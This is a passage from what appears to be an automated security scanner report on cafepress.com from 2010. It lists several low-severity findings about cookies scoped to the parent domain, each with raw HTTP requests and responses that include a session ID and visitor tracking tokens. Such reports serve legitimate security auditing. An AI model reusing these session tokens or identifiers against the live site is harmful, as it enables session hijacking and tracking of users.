__utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59651 Date: Sun, 26 Dec 2010 13:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.19. http://www.cafepress.com/+hats-caps
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+hats-caps
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59393 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.20. http://www.cafepress.com/+ipad-cases
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+ipad-cases
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 88266 Date: Sun, 26 Dec 2010 13:44:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.21. http://www.cafepress.com/+iphone-cases
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+iphone-cases
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 65212 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.22. http://www.cafepress.com/+journals
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+journals
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59322 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.23. http://www.cafepress.com/+keepsake_boxes
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+keepsake_boxes
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59018 Date: Sun, 26 Dec 2010 13:48:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.24. http://www.cafepress.com/+license_plate_frames
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+license_plate_frames
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
